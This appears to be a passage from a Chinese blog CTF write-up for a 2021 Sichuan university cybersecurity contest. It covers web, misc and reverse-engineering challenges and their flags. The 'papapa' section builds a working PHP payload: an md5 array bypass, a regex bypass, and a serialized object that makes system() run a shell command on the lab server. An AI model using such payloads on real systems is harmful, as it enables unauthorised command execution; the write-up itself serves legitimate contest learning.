<h3 id="flag值"><a href="#flag值" class="headerlink" title="flag值"></a>flag值</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;<span class="hljs-number">31</span>df<span class="hljs-number">1</span>d<span class="hljs-number">6</span>dca<span class="hljs-number">4683</span>ad<span class="hljs-number">8</span>c<span class="hljs-number">27</span>acf<span class="hljs-number">8</span>c<span class="hljs-number">7</span>c<span class="hljs-number">04326</span>&#125;<br></code></pre></td></tr></table></figure>







<h3 id="题目二-papapa"><a href="#题目二-papapa" class="headerlink" title="题目二 papapa"></a>题目二 papapa</h3><h3 id="操作内容：-1"><a href="#操作内容：-1" class="headerlink" title="操作内容："></a>操作内容：</h3><p>扫描目录发现robots.txt</p>
<p>看<code>robots.txt</code>有提示<code>main.php</code><br><img src="/wzimg/210.png" alt="image-20210515135112692"><br><img src="/wzimg/211.png" alt="image-20210515140017409"></p>
<p>传参a发现了加密的代码</p>
<p><img src="/wzimg/212.png" alt="image-20210515140140792"></p>
<p>两次base64解码 再 16进制解码得到源码</p>
<p><img src="/wzimg/213.png" alt="image-20210515140619900"></p>
<p><code>md5</code>数组绕过，正则那可以<code>-</code>绕过，也可以用<code>%0a</code>绕过</p>
<p>然后知道了<code>system()</code>能命令执行</p>
<p>构造<code>payload</code></p>
<p>使用<code>ls </code>看到<code>wobushif0agaaa.txt</code></p>
<p><code>cat</code>这个文件</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span><br><span class="hljs-comment">// &#x27;this_is_a_easy_php&#x27;</span><br>error_reporting(<span class="hljs-number">0</span>);<br><br><span class="hljs-class"><span class="hljs-keyword">class</span> <span class="hljs-title">NoVu</span> </span>&#123;<br>    <span class="hljs-keyword">public</span> <span class="hljs-variable">$command</span>=<span class="hljs-string">&#x27;cat wobushif0agaaa.txt&#x27;</span>;<br>&#125;<br><span class="hljs-keyword">echo</span> urlencode(serialize(<span class="hljs-keyword">new</span> NoVu));<br><span class="hljs-meta">?&gt;</span><br></code></pre></td></tr></table></figure>

<p>最后的<code>payload</code></p>
<figure class="highlight llvm"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs llvm">/main.php?a[]<span class="hljs-operator">=</span><span class="hljs-number">1</span>&amp;b[]<span class="hljs-operator">=</span><span class="hljs-number">2</span>&amp;<span class="hljs-keyword">c</span><span class="hljs-operator">=</span>-&amp;d<span class="hljs-operator">=</span>O<span class="hljs-variable">%3</span>A<span class="hljs-number">4</span><span class="hljs-variable">%3</span>A<span class="hljs-string">&quot;NoVu&quot;</span><span class="hljs-variable">%3</span>A<span class="hljs-number">1</span><span class="hljs-variable">%3</span>A<span class="hljs-variable">%7</span>Bs<span class="hljs-variable">%3</span>A<span class="hljs-number">7</span><span class="hljs-variable">%3</span>A<span class="hljs-string">&quot;command&quot;</span><span class="hljs-variable">%3</span>Bs<span class="hljs-variable">%3</span>A<span class="hljs-number">22</span><span class="hljs-variable">%3</span>A<span class="hljs-string">&quot;cat+wobushif0agaaa.txt&quot;</span><span class="hljs-variable">%3</span>B<span class="hljs-variable">%7</span>D<br></code></pre></td></tr></table></figure>

<p><img src="/wzimg/214.png" alt="image-20210515162112926"></p>
<h3 id="flag值-1"><a href="#flag值-1" class="headerlink" title="flag值"></a>flag值</h3><p>flag{73ac78436f0e761123a9888bf24a5c79}</p>
<h3 id="题目三-Misc-我的世界"><a href="#题目三-Misc-我的世界" class="headerlink" title="题目三 Misc 我的世界"></a>题目三 Misc 我的世界</h3><h3 id="操作内容：-2"><a href="#操作内容：-2" class="headerlink" title="操作内容："></a>操作内容：</h3><pre><code>下载文件后打开我的世界，发现真的是个游戏：
</code></pre>
<p><img src="/wzimg/215.png" alt="img"><img src="/wzimg/216.png" alt="img"><img src="/wzimg/217.png" alt="img"><img src="/wzimg/218.png" alt="img"> </p>
<p>在信标处宝箱内可以得到一本名字为<code>flag1</code>的书，打开后发现以上字符串，初步断定是<code>栅栏加密</code>，先解一下，这里我用的<a target="_blank" rel="noopener" href="https://www.qqxiuzi.cn/bianma/zhalanmima.php">在线工具</a>，当栏数为14时得到</p>
<p><img src="/wzimg/219.png" alt="img"> </p>
<p>很像<code>flag</code>了，尝试提交但是不对，继续在地图内探索，在信标旁内的洞穴内发现有如下：</p>
<p><img src="/wzimg/220.png" alt="img"></p>
<p>可以看到在信标附近有异常，飞过去看，是这个：<br><img src="/wzimg/221.png" alt="img"></p>
<p>结合flag=1+1，经过尝试得到flag，居然是把<code>CTF515</code>加在后面，不得不说这个题确实有点脑洞的感觉。</p>
<p>flag值上传图片失败。错误信息： <code>Comman</code>:</p>
<figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;scdxsCTF<span class="hljs-number">2021422</span>CTF<span class="hljs-number">515</span>&#125;<br></code></pre></td></tr></table></figure>







<h3 id="题目四-Misc-disk-recover"><a href="#题目四-Misc-disk-recover" class="headerlink" title="题目四 Misc disk-recover"></a>题目四 Misc disk-recover</h3><h3 id="操作内容：-3"><a href="#操作内容：-3" class="headerlink" title="操作内容："></a>操作内容：</h3><p>下载解压题目得到<code>upload.pcapng</code>文件，直接用<code>7-Zip</code>可以解压出一个已损坏的光盘映像文件<code>disk-recovery.img</code>，直接用<code>DiskGenius</code>恢复。</p>
<p>先打开损坏文件：</p>
<p><img src="/wzimg/222.png" alt="img"></p>
<p>再选中恢复</p>
<p><img src="/wzimg/223.png" alt="img"> </p>
<pre><code>得到了一个.xls文件,
</code></pre>
<p><img src="/wzimg/224.png" alt="img"> </p>
<p><img src="/wzimg/225.png" alt="img"> </p>
<p>打开就可以看到flag</p>
<h3 id="flag"><a href="#flag" class="headerlink" title="flag:"></a>flag:</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;E<span class="hljs-number">7</span>A<span class="hljs-number">10</span>C<span class="hljs-number">15</span>E<span class="hljs-number">26</span>AA<span class="hljs-number">5750070</span>EF<span class="hljs-number">756</span>AAA<span class="hljs-number">1</span>F<span class="hljs-number">7</span>C&#125;<br></code></pre></td></tr></table></figure>







<h3 id="题目五-Misc-pack"><a href="#题目五-Misc-pack" class="headerlink" title="题目五 Misc pack"></a>题目五 Misc pack</h3><h3 id="操作内容"><a href="#操作内容" class="headerlink" title="操作内容:"></a>操作内容:</h3><p>ctf.exe，pe view打开，可以看到节区名错了</p>
<h2 id=""><a href="#" class="headerlink" title=""></a><img src="/wzimg/226.png" alt="img"></h2><p><code>upx</code>脱壳，脱壳先修改节区名</p>
<p>脱壳完后，用<code>ResourceHacker.exe</code>打开，看资源，得到flag分为2部分</p>
<p><img src="/wzimg/227.png" alt="img"> </p>
<h3 id="flag："><a href="#flag：" class="headerlink" title="flag："></a>flag：</h3><h3 id="flag-0bed66d154ccbdd07a6342abf97a5cfc"><a href="#flag-0bed66d154ccbdd07a6342abf97a5cfc" class="headerlink" title="flag{0bed66d154ccbdd07a6342abf97a5cfc}"></a>flag{0bed66d154ccbdd07a6342abf97a5cfc}</h3><h3 id="题目六-em0ji"><a href="#题目六-em0ji" class="headerlink" title="题目六 em0ji"></a>题目六 em0ji</h3><h3 id="操作内容：-4"><a href="#操作内容：-4" class="headerlink" title="操作内容："></a>操作内容：</h3><p>下载附件打开<br><img src="/wzimg/228.png" alt="image-20210515141433133"></p>
<p>前面四个肯定是<code>flag</code></p>
<p>所以借此线索进行收集</p>
<p>网上搜索emoji的官方网站</p>
<p><a target="_blank" rel="noopener" href="https://www.emojiall.com/zh-hans/emoji/%F0%9F%98%81">https://www.emojiall.com/zh-hans/emoji/%F0%9F%98%81</a></p>
<p><img src="/wzimg/229.png" alt="image-20210515203137931"></p>
<p>查看简短代码的首字母，拼接得到</p>
<p><img src="/wzimg/230.png" alt="image-20210515141708869"></p>
<h3 id="flag-1"><a href="#flag-1" class="headerlink" title="flag"></a>flag</h3><figure class="highlight dust"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs dust"><span class="xml">flag</span><span class="hljs-template-variable">&#123;emojiisverysimple&#125;</span><br></code></pre></td></tr></table></figure>



<h3 id="题目七-easy-re"><a href="#题目七-easy-re" class="headerlink" title="题目七 easy_re"></a>题目七 easy_re</h3><h3 id="操作内容：-5"><a href="#操作内容：-5" class="headerlink" title="操作内容："></a>操作内容：</h3><p>upx解壳，手动或者upx脱。</p>
<p>分析流程<br><img src="/wzimg/231.png"><br>脚本</p>
<h4 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">()</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">char</span> code[]=<span class="hljs-string">&quot;&#x27;- &amp;:8.4a 3$a&amp;3$ 5```&lt;&quot;</span>;<br>	<span class="hljs-keyword">int</span> i;<br>	<br>	<span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;<span class="hljs-number">22</span>;i++)<br>	&#123;<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c&quot;</span>,code[i]^<span class="hljs-number">0x41</span>);<br>	&#125;<br>&#125;<br></code></pre></td></tr></table></figure>


<h3 id="flag值-2"><a href="#flag值-2" class="headerlink" title="flag值"></a>flag值</h3><figure class="highlight erlang-repl"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs erlang-repl">flag&#123;you are great!!!&#125;<br></code></pre></td></tr></table></figure>





<h3 id="题目八-easy-pyc"><a href="#题目八-easy-pyc" class="headerlink" title="题目八 easy.pyc"></a>题目八 easy.pyc</h3><h3 id="操作内容：-6"><a href="#操作内容：-6" class="headerlink" title="操作内容："></a>操作内容：</h3><p>pyc转py</p>
<figure class="highlight taggerscript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs taggerscript">uncompyle6 -o  C:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\h</span>p<span class="hljs-symbol">\D</span>ownloads<span class="hljs-symbol">\e</span>asy.py C:<span class="hljs-symbol">\U</span>sers<span class="hljs-symbol">\h</span>p<span class="hljs-symbol">\D</span>ownloads<span class="hljs-symbol">\e</span>asy.pyc<br></code></pre></td></tr></table></figure>

<p>然后看流程<br><img src="/wzimg/234.png"></p>
<h4 id="脚本-1"><a href="#脚本-1" class="headerlink" title="脚本"></a>脚本</h4><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br>url = <span class="hljs-string">&quot;XlhlX0sMEWNiDxQQDgwTXl5eZRFgFWMOFBATXhMMYw8PD2UMZUk=&quot;</span><br>str_url = base64.b64decode(url)<br><span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> str_url:<br>    x=(i-<span class="hljs-number">6</span>)^<span class="hljs-number">62</span><br>    <span class="hljs-built_in">print</span>(<span class="hljs-built_in">chr</span>(x),end=<span class="hljs-string">&#x27;&#x27;</span>)<br></code></pre></td></tr></table></figure>


<h3 id="flag值-3"><a href="#flag值-3" class="headerlink" title="flag值"></a>flag值</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;<span class="hljs-number">85</span>cb<span class="hljs-number">704683</span>fffa<span class="hljs-number">5</span>d<span class="hljs-number">1</span>c<span class="hljs-number">6043</span>f<span class="hljs-number">38</span>c<span class="hljs-number">777</span>a<span class="hljs-number">8</span>a&#125;<br></code></pre></td></tr></table></figure>



<h3 id="题目九-base变形计-exe"><a href="#题目九-base变形计-exe" class="headerlink" title="题目九 base变形计.exe"></a>题目九 base变形计.exe</h3><h3 id="操作内容：-7"><a href="#操作内容：-7" class="headerlink" title="操作内容："></a>操作内容：</h3><p>upx脱壳<br><img src="/wzimg/232.png"></p>
<p>先得到str2</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><code class="hljs c"><span class="hljs-meta">#<span class="hljs-meta-keyword">include</span><span class="hljs-meta-string">&lt;stdio.h&gt;</span></span><br><br><span class="hljs-function"><span class="hljs-keyword">int</span> <span class="hljs-title">main</span><span class="hljs-params">(<span class="hljs-keyword">void</span>)</span></span><br><span class="hljs-function"></span>&#123;<br>	<span class="hljs-keyword">int</span> v9[]=&#123;<span class="hljs-number">0x00000050</span>,<span class="hljs-number">0x00000067</span>,<span class="hljs-number">0x00000072</span>,<span class="hljs-number">0x00000062</span>,<span class="hljs-number">0x00000050</span>,<span class="hljs-number">0x00000019</span>,<span class="hljs-number">0x00000079</span>,<span class="hljs-number">0x0000001e</span>,<span class="hljs-number">0x00000047</span>,<span class="hljs-number">0x0000005e</span>,<span class="hljs-number">0x0000004f</span>,<span class="hljs-number">0x00000072</span>,<span class="hljs-number">0x00000044</span>,<span class="hljs-number">0x0000005d</span>,<span class="hljs-number">0x0000005f</span>,<span class="hljs-number">0x0000001b</span>,<span class="hljs-number">0x00000044</span>,<span class="hljs-number">0x00000070</span>,<span class="hljs-number">0x00000062</span>,<span class="hljs-number">0x00000063</span>,<span class="hljs-number">0x00000047</span>,<span class="hljs-number">0x0000005d</span>,<span class="hljs-number">0x00000047</span>,<span class="hljs-number">0x00000072</span>,<span class="hljs-number">0x00000045</span>,<span class="hljs-number">0x0000005e</span>,<span class="hljs-number">0x00000050</span>,<span class="hljs-number">0x00000063</span>,<span class="hljs-number">0x00000047</span>,<span class="hljs-number">0x00000070</span>,<span class="hljs-number">0x0000005b</span>,<span class="hljs-number">0x00000018</span>,<span class="hljs-number">0x00000050</span>,<span class="hljs-number">0x00000060</span>,<span class="hljs-number">0x00000069</span>,<span class="hljs-number">0x0000001f</span>,<span class="hljs-number">0x00000053</span>,<span class="hljs-number">0x0000005d</span>,<span class="hljs-number">0x0000004c</span>,<span class="hljs-number">0x00000066</span>,<span class="hljs-number">0x00000045</span>,<span class="hljs-number">0x0000005e</span>,<span class="hljs-number">0x00000053</span>,<span class="hljs-number">0x00000072</span>,<span class="hljs-number">0x00000053</span>,<span class="hljs-number">0x00000070</span>,<span class="hljs-number">0x0000005b</span>,<span class="hljs-number">0x0000007d</span>,<span class="hljs-number">0x00000053</span>,<span class="hljs-number">0x00000019</span>,<span class="hljs-number">0x0000001a</span>,<span class="hljs-number">0x00000017</span>&#125;;<br>	<span class="hljs-keyword">char</span> str2[]=<span class="hljs-string">&quot;0000000000000000000000000000000000000000000000000000&quot;</span>;<br>	<span class="hljs-keyword">int</span> i;<br>	<br>	<span class="hljs-keyword">for</span>(i=<span class="hljs-number">0</span>;i&lt;=<span class="hljs-number">51</span>;i++)<br>	&#123;<br>		str2[i]=<span class="hljs-number">42</span>^v9[i];<br>		<br>		<span class="hljs-built_in">printf</span>(<span class="hljs-string">&quot;%c&quot;</span>,str2[i]);<br>	&#125;<br>&#125;<br><span class="hljs-comment">//zMXHz3S4mteXnwu1nZHImwmXotzImZq2zJC5ywfLotyXyZqWy30=</span><br></code></pre></td></tr></table></figure>

<p>变表base解密</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> base64<br><span class="hljs-keyword">import</span> string<br><br>str1 = <span class="hljs-string">&#x27;zMXHz3S4mteXnwu1nZHImwmXotzImZq2zJC5ywfLotyXyZqWy30=&#x27;</span><br><br>string1 = <span class="hljs-string">&#x27;abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/&#x27;</span><br>string2 = <span class="hljs-string">&quot;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/&quot;</span><br><br><span class="hljs-built_in">print</span>(base64.b64decode(str1.translate(<span class="hljs-built_in">str</span>.maketrans(string1, string2))))<br></code></pre></td></tr></table></figure>


<h3 id="flag-2"><a href="#flag-2" class="headerlink" title="flag"></a>flag</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;<span class="hljs-number">81115</span>e<span class="hljs-number">578</span>b<span class="hljs-number">1</span>c<span class="hljs-number">196</span>b<span class="hljs-number">346</span>f<span class="hljs-number">79</span>aae<span class="hljs-number">961</span>c<span class="hljs-number">40</span>c&#125;<br></code></pre></td></tr></table></figure>



<h3 id="题目十-2021年四川省大学生网络安全技能大赛问卷调查"><a href="#题目十-2021年四川省大学生网络安全技能大赛问卷调查" class="headerlink" title="题目十 2021年四川省大学生网络安全技能大赛问卷调查"></a>题目十 2021年四川省大学生网络安全技能大赛问卷调查</h3><h3 id="操作内容：-8"><a href="#操作内容：-8" class="headerlink" title="操作内容："></a>操作内容：</h3><p>有手就行</p>
<h3 id="脚本-2"><a href="#脚本-2" class="headerlink" title="脚本:"></a>脚本:</h3><p>无</p>
<h3 id="flag-3"><a href="#flag-3" class="headerlink" title="flag:"></a>flag:</h3><figure class="highlight apache"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><code class="hljs apache"><span class="hljs-attribute">flag</span>&#123;ZWNkeHNjdGZpc<span class="hljs-number">2</span>cwMGQ&#125;<br></code></pre></td></tr></table></figure>
  </div>
</article>



        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
         
          <li><a href="/">Home</a></li>
         
          <li><a href="/about/">About</a></li>
         
          <li><a href="/archives/">Writing</a></li>
         
          <li><a href="/projects_url">Projects</a></li>
         
          <li><a href="/%5Bobject%20Object%5D">highlight</a></li>
        
      </ul>
    </div>

    <div id="toc-footer" style="display: none">
      <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup"><span class="toc-number">1.</span> <span class="toc-text">2021年四川省大学生网络安全技能大赛  writeup</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80%E3%80%81%E6%88%98%E9%98%9F%E4%BF%A1%E6%81%AF"><span class="toc-number">1.1.</span> <span class="toc-text">一、战队信息</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C%E3%80%81%E8%A7%A3%E9%A2%98%E6%83%85%E5%86%B5"><span class="toc-number">1.2.</span> <span class="toc-text">二、解题情况</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%89%E3%80%81-%E8%A7%A3%E9%A2%98%E8%BF%87%E7%A8%8B"><span class="toc-number">1.3.</span> <span class="toc-text">三、 解题过程</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%80-EZSQL"><span class="toc-number">1.3.1.</span> <span class="toc-text">题目一 EZSQL</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A"><span class="toc-number">1.3.2.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC"><span class="toc-number">1.3.3.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BA%8C-papapa"><span class="toc-number">1.3.4.</span> <span class="toc-text">题目二 papapa</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-1"><span class="toc-number">1.3.5.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-1"><span class="toc-number">1.3.6.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%89-Misc-%E6%88%91%E7%9A%84%E4%B8%96%E7%95%8C"><span class="toc-number">1.3.7.</span> <span class="toc-text">题目三 Misc 我的世界</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-2"><span class="toc-number">1.3.8.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%9B%9B-Misc-disk-recover"><span class="toc-number">1.3.9.</span> <span class="toc-text">题目四 Misc disk-recover</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-3"><span class="toc-number">1.3.10.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag"><span class="toc-number">1.3.11.</span> <span class="toc-text">flag:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%BA%94-Misc-pack"><span class="toc-number">1.3.12.</span> <span class="toc-text">题目五 Misc pack</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9"><span class="toc-number">1.3.13.</span> <span class="toc-text">操作内容:</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link"><span class="toc-number">1.4.</span> <span class="toc-text"></span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%EF%BC%9A"><span class="toc-number">1.4.1.</span> <span class="toc-text">flag：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-0bed66d154ccbdd07a6342abf97a5cfc"><span class="toc-number">1.4.2.</span> <span class="toc-text">flag{0bed66d154ccbdd07a6342abf97a5cfc}</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%85%AD-em0ji"><span class="toc-number">1.4.3.</span> <span class="toc-text">题目六 em0ji</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-4"><span class="toc-number">1.4.4.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-1"><span class="toc-number">1.4.5.</span> <span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B8%83-easy-re"><span class="toc-number">1.4.6.</span> <span class="toc-text">题目七 easy_re</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-5"><span class="toc-number">1.4.7.</span> <span class="toc-text">操作内容：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC"><span class="toc-number">1.4.7.1.</span> <span class="toc-text">脚本</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-2"><span class="toc-number">1.4.8.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%85%AB-easy-pyc"><span class="toc-number">1.4.9.</span> <span class="toc-text">题目八 easy.pyc</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-6"><span class="toc-number">1.4.10.</span> <span class="toc-text">操作内容：</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC-1"><span class="toc-number">1.4.10.1.</span> <span class="toc-text">脚本</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag%E5%80%BC-3"><span class="toc-number">1.4.11.</span> <span class="toc-text">flag值</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E4%B9%9D-base%E5%8F%98%E5%BD%A2%E8%AE%A1-exe"><span class="toc-number">1.4.12.</span> <span class="toc-text">题目九 base变形计.exe</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-7"><span class="toc-number">1.4.13.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-2"><span class="toc-number">1.4.14.</span> <span class="toc-text">flag</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E5%8D%81-2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B%E9%97%AE%E5%8D%B7%E8%B0%83%E6%9F%A5"><span class="toc-number">1.4.15.</span> <span class="toc-text">题目十 2021年四川省大学生网络安全技能大赛问卷调查</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E6%93%8D%E4%BD%9C%E5%86%85%E5%AE%B9%EF%BC%9A-8"><span class="toc-number">1.4.16.</span> <span class="toc-text">操作内容：</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#%E8%84%9A%E6%9C%AC-2"><span class="toc-number">1.4.17.</span> <span class="toc-text">脚本:</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#flag-3"><span class="toc-number">1.4.18.</span> <span class="toc-text">flag:</span></a></li></ol></li></ol></li></ol>
    </div>

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&text=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&title=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://example.com/2021/05/19/2021%E5%B9%B4%E5%9B%9B%E5%B7%9D%E7%9C%81%E5%A4%A7%E5%AD%A6%E7%94%9F%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E6%8A%80%E8%83%BD%E5%A4%A7%E8%B5%9B-writeup/&is_video=false&description=2021年四川省大学生网络安全技能大赛  writeup"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
